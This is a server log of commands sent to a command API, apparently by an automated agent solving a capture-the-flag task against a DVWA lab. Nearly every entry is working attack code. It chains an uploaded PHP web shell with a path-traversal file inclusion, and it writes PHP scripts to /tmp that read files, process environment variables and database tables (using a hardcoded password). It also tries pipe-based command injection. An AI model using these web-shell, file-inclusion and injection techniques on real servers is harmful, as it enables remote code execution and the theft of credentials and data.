SHELL_FILE="img_2b8e0aaa48.pht"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# Build proper URL with all params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--data-urlencode "c=php -r \"\$l=file('/var/www/html/hackable/flags/fi.php');echo implode('',\$l);\"" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| strings | grep -A10 "###" | head -15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2026-03-06 16:15:27,374 [INFO] 127.0.0.1 - - [06/Mar/2026 16:15:27] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:15:31,890 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# The LFI response includes the fi.php content. Let me look at the full included page output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# by getting the page before the DOCTYPE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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${FLAG_ENCODED}" 2&gt;/dev/null \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| python3 -c "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data = sys.stdin.read()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# Get everything before DOCTYPE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idx = data.find('&lt;!DOCTYPE')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if idx &gt; 0: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print(data[:idx])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print(data[:500])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2026-03-06 16:15:31,969 [INFO] 127.0.0.1 - - [06/Mar/2026 16:15:31] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:15:37,987 [INFO] Executing command: # The flag is on line 3. The page includes it but "hides" line 3 output.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# Let me use our shell+PHP to read just line 3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SHELL_FILE="img_2b8e0aaa48.pht"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# Write a PHP script to file, then execute it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--data-urlencode 'c=php -r "$f=file(\"/var/www/html/hackable/flags/fi.php\"); foreach($f as $i=&gt;$l){echo $i.\": \".$l;}"' \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "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data = sys.stdin.read()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start = data.find('###')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end = data.find('###', start+3)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if start &gt;= 0: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print(data[start:end+3])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2026-03-06 16:15:38,110 [INFO] 127.0.0.1 - - [06/Mar/2026 16:15:38] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:15:47,859 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Write a PHP script to /tmp and execute it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# First write it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WRITE_CMD="php -r \"file_put_contents('/tmp/r.php', '&lt;?php \\\$f=file(\\\"/var/www/html/hackable/flags/fi.php\\\"); foreach(\\\$f as \\\$i=&gt;\\\$l){echo \\\$i.\\\":\\t\\\".base64_encode(\\\$l).\\\"\\n\\\";}');\""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--data-urlencode "c=$WRITE_CMD" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3] if s&gt;=0 else 'not found')"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2026-03-06 16:15:47,980 [INFO] 127.0.0.1 - - [06/Mar/2026 16:15:47] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:16:06,623 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Execute the written PHP script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--data-urlencode "c=php /tmp/r.php" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "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import sys, base64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d = sys.stdin.read()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s = d.find('###')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e = d.find('###', s+3)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content = d[s+3:e]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print(content[:2000])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# Try to decode any base64 lines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for line in content.split('\n'):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if ':' in line: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parts = line.split('\t')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if len(parts) &gt; 1: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    decoded = base64.b64decode(parts[1].strip()).decode()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    print(f'Line {parts[0]}: {decoded}', end='')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except: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2026-03-06 16:16:06,741 [INFO] 127.0.0.1 - - [06/Mar/2026 16:16:06] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:16:44,774 [INFO] Executing command: python3 -c "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import base64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line4 = 'NC4pI' + 'FRoZSBwb29s' + 'IG9uIH' + 'RoZSByb29mIG1' + '1c3QgaGF' + '2ZSBh' + 'IGxlY' + 'Wsu'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print('Decoded line4:', base64.b64decode(line4).decode())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2026-03-06 16:16:44,842 [INFO] 127.0.0.1 - - [06/Mar/2026 16:16:44] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:17:05,280 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# The flag file doesn't contain FLAG{} format directly - search WHOLE web root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# Also check /etc/passwd for flag, or look in other common CTF locations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--data-urlencode "c=php -r \"echo shell_exec('find /var/www -name \"*.txt\" -o -name \"*.flag\" -o -name \"flag*\" 2&gt;/dev/null');\"" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:17:05,603 [INFO] 127.0.0.1 - - [06/Mar/2026 16:17:05] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:17:49,794 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Read the interesting files: tmp.txt and custom_log.txt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--data-urlencode "c=php -r \"echo file_get_contents('/var/www/html/hackable/tmp.txt');\"" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(repr(d[s:e+3]))"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2026-03-06 16:17:49,917 [INFO] 127.0.0.1 - - [06/Mar/2026 16:17:49] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:18:10,523 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Search for FLAG{ pattern in all readable files under /var/www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--data-urlencode "c=php -r \"\$o=shell_exec('find /var/www/html -readable -type f 2&gt;/dev/null'); \$files=explode(\"\n\",\$o); foreach(\$files as \$f){ if(empty(\$f)) continue; \$c=@file_get_contents(\$f); if(\$c &amp;&amp; strpos(\$c,'FLAG{')!==false){ echo \"FOUND: \$f\\n\"; echo \$c; }}\"" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:18:10,643 [INFO] 127.0.0.1 - - [06/Mar/2026 16:18:10] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:19:07,932 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Write a PHP search script to /tmp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cat &gt; /tmp/search_flag.php &lt;&lt; 'PHPEOF'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$o = shell_exec('find /var/www/html -readable -type f 2&gt;/dev/null');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$files = explode("\n", $o);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foreach($files as $f){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if(empty($f)) continue;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$c = @file_get_contents($f);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if($c &amp;&amp; strpos($c,'FLAG{') !== false){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echo "FOUND IN: $f\n";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// Extract flag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preg_match('/FLAG\{[^}]+\}/', $c, $m);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echo "FLAG: " . $m[0] . "\n";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echo "DONE\n";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PHPEOF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# Upload via write using the shell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--data-urlencode "c=php -r \"copy('/var/www/html/hackable/uploads/custom_d78aa372606dba9554c1133268edcc33/img_2b8e0aaa48.pht','/tmp/x.php');\"" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" &gt; /dev/null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# Write search script using the shell via file_put_contents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SCRIPT=$(cat /tmp/search_flag.php | python3 -c "import sys; print(sys.stdin.read().replace('\\n','\\\\n').replace(\"'\",'\\\\x27'))")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--data-urlencode "c=php -r \"file_put_contents('/tmp/sf.php', base64_decode('$(base64 -w0 /tmp/search_flag.php)'));\"" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:19:08,102 [INFO] 127.0.0.1 - - [06/Mar/2026 16:19:08] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:19:27,642 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Execute the search script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--data-urlencode "c=php /tmp/sf.php" \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--get \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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:19:28,487 [INFO] 127.0.0.1 - - [06/Mar/2026 16:19:28] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:20:25,726 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Found in index.php - but the flag is likely the placeholder. Let me read that section of index.php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cat &gt; /tmp/read_flag.php &lt;&lt; 'PHPEOF'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$c = file_get_contents('/var/www/html/index.php');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preg_match_all('/FLAG\{[^}]+\}/', $c, $m);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foreach($m[0] as $match) {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echo "FLAG: $match\n";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// Also show context around FLAG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$pos = strpos($c, 'FLAG{');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if($pos !== false) {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echo "\nCONTEXT:\n" . substr($c, max(0,$pos-100), 300) . "\n";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PHPEOF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--data-urlencode "c=php -r \"file_put_contents('/tmp/rf.php', base64_decode('$(base64 -w0 /tmp/read_flag.php)'));\"" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" &gt; /dev/null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--data-urlencode "c=php /tmp/rf.php" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:20:26,042 [INFO] 127.0.0.1 - - [06/Mar/2026 16:20:26] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:20:53,005 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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cat &gt; /tmp/deepsearch.php &lt;&lt; 'PHPEOF'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// Search in DB first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require_once('/var/www/html/dvwa/includes/dvwaPage.inc.php');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$db = dvwaDatabaseConnect();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// Check all tables for FLAG pattern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$tables = ['users','guestbook','access_log','security_log'];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foreach($tables as $t) {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$r = @mysqli_query($db, "SELECT * FROM $t");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if($r) {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while($row = mysqli_fetch_assoc($r)) {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foreach($row as $k=&gt;$v) {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    if(strpos($v,'FLAG{')!==false) {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        echo "DB TABLE $t COL $k: $v\n";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// Search filesystem more broadly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$dirs = ['/var/www', '/tmp', '/home', '/root', '/etc'];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foreach($dirs as $dir) {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$o = shell_exec("find $dir -readable -type f -size -100k 2&gt;/dev/null");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$files = explode("\n", $o);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foreach($files as $f) {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if(empty($f)) continue;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$c = @file_get_contents($f);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if($c &amp;&amp; preg_match('/FLAG\{[a-zA-Z0-9_]+\}/', $c, $m)) {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if($m[0] !== 'FLAG{something_about_flag}') {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       echo "FILE $f: ".$m[0]."\n";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echo "SEARCH DONE\n";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PHPEOF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--data-urlencode "c=php -r \"file_put_contents('/tmp/ds.php', base64_decode('$(base64 -w0 /tmp/deepsearch.php)'));\"" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" &gt; /dev/null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--data-urlencode "c=php /tmp/ds.php" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:20:53,278 [INFO] 127.0.0.1 - - [06/Mar/2026 16:20:53] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:21:04,331 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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cat &gt; /tmp/deepsearch2.php &lt;&lt; 'PHPEOF'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// Direct DB connect without DVWA functions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$db = @mysqli_connect("mysql-dvwa", "dvwa", "p@ssw0rd", "dvwa");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if(!$db) $db = @mysqli_connect("localhost", "dvwa", "p@ssw0rd", "dvwa");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if(!$db) $db = @mysqli_connect("127.0.0.1", "dvwa", "p@ssw0rd", "dvwa");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if($db) {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echo "DB CONNECTED\n";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// Check all tables including any hidden ones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$r = mysqli_query($db, "SHOW TABLES");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while($row = mysqli_fetch_array($r)) {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$t = $row[0];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echo "TABLE: $t\n";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$r2 = mysqli_query($db, "SELECT * FROM `$t` LIMIT 20");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if($r2) {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while($row2 = mysqli_fetch_assoc($r2)) {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    foreach($row2 as $k=&gt;$v) {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        if(stripos($v,'flag')!==false || stripos($v,'FLAG')!==false) {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            echo "  COL $k: $v\n";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echo "DB FAILED\n";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// Also check environment variables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echo "\nENV:\n";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foreach($_ENV as $k=&gt;$v) {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if(stripos($k,'flag')!==false || stripos($v,'FLAG{')!==false) {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echo "$k=$v\n";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// Check /proc/1/environ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$e = @file_get_contents('/proc/1/environ');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if($e) {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$e = str_replace("\0", "\n", $e);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foreach(explode("\n",$e) as $line) {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if(stripos($line,'flag')!==false) echo "PROC_ENV: $line\n";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echo "DONE\n";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PHPEOF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--data-urlencode "c=php -r \"file_put_contents('/tmp/ds2.php', base64_decode('$(base64 -w0 /tmp/deepsearch2.php)'));\"" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" &gt; /dev/null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--data-urlencode "c=php /tmp/ds2.php" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:21:04,663 [INFO] 127.0.0.1 - - [06/Mar/2026 16:21:04] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:21:11,133 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Check the Command Injection module source - it might have its own flag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curl -s -b /tmp/dvwa2.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=exec&amp;security=custom" \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| python3 -c "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import sys, re, html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c = sys.stdin.read()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c = re.sub('&lt;[^&gt;]+&gt;', '', c)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c = html.unescape(c)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print(c)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" | grep -v "^$" | grep -i "flag\|FLAG\|hidden\|secret" | head -10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2026-03-06 16:21:11,255 [INFO] 127.0.0.1 - - [06/Mar/2026 16:21:11] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:22:37,994 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Use command injection module directly to run shell commands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# First check exec source for what IP parsing allows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curl -s -b /tmp/dvwa2.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=exec&amp;security=custom" \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| python3 -c "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import sys, re, html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c = sys.stdin.read()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c = re.sub('&lt;[^&gt;]+&gt;', '', c)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c = html.unescape(c)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# Print just the PHP code part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start = c.find('&lt;?php')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if start &gt;= 0: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print(c[start:start+1500])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2026-03-06 16:22:38,130 [INFO] 127.0.0.1 - - [06/Mar/2026 16:22:38] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:22:43,924 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Check if flag is hidden in the command injection output specifically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# Try the exec module with pipe injection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-X POST \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--data-urlencode "ip=127.0.0.1|id" \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--data-urlencode "Submit=Submit" \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"http://100.113.75.28:8081/vulnerabilities/exec/" \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| grep -i "uid\|result\|pre\|www" | head -5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2026-03-06 16:22:43,961 [INFO] 127.0.0.1 - - [06/Mar/2026 16:22:43] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:22:55,213 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# The flag must be stored somewhere specific. Let me search the entire filesystem more carefully.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# Key locations: /flag, /flag.txt, /root/flag, environment, Docker secrets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cat &gt; /tmp/final_search.php &lt;&lt; 'PHPEOF'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$searches = [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'/flag', '/flag.txt', '/flag.php', '/secret', '/secret.txt',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'/root/flag', '/root/flag.txt', '/root/secret',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'/home/flag', '/tmp/flag', '/opt/flag',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'/var/flag', '/etc/flag',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'/var/www/flag', '/var/www/html/flag',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'/var/www/html/flag.txt', '/var/www/html/flag.php',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'/var/www/html/.flag', '/var/www/html/secret.txt'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foreach($searches as $f) {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if(file_exists($f)) {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echo "EXISTS: $f\n";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$c = @file_get_contents($f);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echo "CONTENT: $c\n";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// Search by content in whole /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$r = shell_exec('find / -maxdepth 5 -readable -type f -name "*.txt" 2&gt;/dev/null');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foreach(explode("\n",$r) as $f) {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if(empty($f)) continue;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$c = @file_get_contents($f);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if($c &amp;&amp; preg_match('/FLAG\{[a-zA-Z0-9_!@#$%^&amp;*]+\}/', $c, $m)) {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if($m[0] !== 'FLAG{something_about_flag}') {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echo "FOUND $f: ".$m[0]."\n";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echo "COMPLETE\n";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PHPEOF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--data-urlencode "c=php -r \"file_put_contents('/tmp/fs.php', base64_decode('$(base64 -w0 /tmp/final_search.php)'));\"" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" &gt; /dev/null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--data-urlencode "c=php /tmp/fs.php" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:22:55,687 [INFO] 127.0.0.1 - - [06/Mar/2026 16:22:55] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:23:02,522 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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SESSION_DIR="custom_d78aa372606dba9554c1133268edcc33"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ENCODED_PATH="..%252F..%252Fhackable%252Fuploads%252F${SESSION_DIR}%252F${SHELL_FILE}"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--data-urlencode "c=php -r \"echo file_get_contents('/foothold/flag.txt');\"" \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--get "http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| python3 -c "import sys; d=sys.stdin.read(); s=d.find('###'); e=d.find('###',s+3); print(d[s:e+3])"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2026-03-06 16:23:02,645 [INFO] 127.0.0.1 - - [06/Mar/2026 16:23:02] "POST /api/command HTTP/1.1" 200 -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